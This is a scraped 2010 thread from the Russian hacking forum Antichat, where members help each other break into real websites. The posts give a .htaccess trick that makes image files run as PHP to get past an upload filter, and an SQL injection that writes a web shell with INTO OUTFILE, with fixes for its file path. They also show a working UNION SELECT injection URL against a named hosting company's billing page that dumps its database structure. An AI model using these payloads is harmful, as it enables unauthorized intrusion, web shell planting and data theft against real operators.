Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
28.02.2010, 15:05
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Сообщение от daniel_1024
как можно обойти фильтрацию загружаемого файла в админке ?!
по сути можно загружать "все файлы", но при заливке пхп-скрипта вылезает ошибка...что можно в таких случаях сделать ?
Ошибка какая? попрбуй .htaccess залить
AddType application/x-httpd-php .php .htm .html .jpg .gif
потом выбирай то что заливается =)
|
|
|
28.02.2010, 18:10
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324
Репутация:
40
|
|
Такая проблема:
Нашел скулю заливаю через нее шелл
INTO OUTFILE 'D:\htdocs\www.site.ru\shel.php'
из внешки его не вижу, а по LOAD_FILE нормально видит.
По LOAD_FILE невидно ни одного файла кроме тех что сам залил.
В ошибках путь вылазит:
D:\htdocs\www.site.ru\index.php
D:\htdocs\www.site.ru\admin\conf.php
Как найти реальное расположение сайта или что ето за прикол такой)?
|
|
|
|
28.02.2010, 18:27
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от FAQ666
По LOAD_FILE невидно ни одного файла кроме тех что сам залил.
Ну наверное тогда путь не тот
База на другом серваке
Чмоды
concat_ws(0x3a,user,host)+from+mysql.user
посмотри как прописан твой user()
|
|
|
|
28.02.2010, 18:31
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324
Репутация:
40
|
|
Сообщение от Jokester
concat_ws(0x3a,user,host)+from+mysql.user
посмотри как прописан твой user()
concat_ws(0x3a,user,host)
L2Emu:127.0.0.1
concat_ws(0x3a,user,host,file_priv)
root:localhost:Y
|
|
|
|
28.02.2010, 18:49
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
2FAQ666
что-то мне подсказывает, что проблема возникла из-за слешей, попробуй
INTO OUTFILE 'D:/htdocs/www.site.ru/shel.php'
Последний раз редактировалось Iceangel_; 28.02.2010 в 19:14..
|
|
|
|
28.02.2010, 19:45
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324
Репутация:
40
|
|
Сообщение от Iceangel_
2FAQ666
что-то мне подсказывает, что проблема возникла из-за слешей, попробуй
Ой спасибочки)))))) так и есть!
|
|
|
|
28.02.2010, 21:03
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
А можно ли в инъекции определить тип поля и длину(если Text)?
Пока ходил курить, нашёл ответ, если кого заинтересовало и кто не знает:
GROUP_CONCAT(column_name,0x3a,column_type) from information_schema.columns where table_name='tablename'
Последний раз редактировалось Seravin; 28.02.2010 в 21:47..
|
|
|
|
28.02.2010, 22:14
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от Strilo4ka
Взломщику такая инфа непредоставляеться.
Если иньекция в сценарии администрирований баз данный через веб, а там чето mysql_field_flags...!
ИМХО
Код:
http://www.dsthosting.com/billing/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,GROUP_CONCAT(column_name,0x3a,column_type,0x3a,CHARACTER_MAXIMUM_LENGTH),9,10,11,12,13,GROUP_CONCAT(column_name,0x3a,column_type),15,16+from+information_schema.columns--
Мне предоставляется!) ИМХО!)
|
|
|
|
28.02.2010, 22:18
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от Strilo4ka
дадада давай на <4 ветки)
Не ну понятно, что я это для пятой. 4ая и о колонках особо инфой в скулях не блещет)
|
|
|
|
01.03.2010, 14:01
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
Для оперы не знаю, а для Мозиллы есть плагин Tamper Data.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
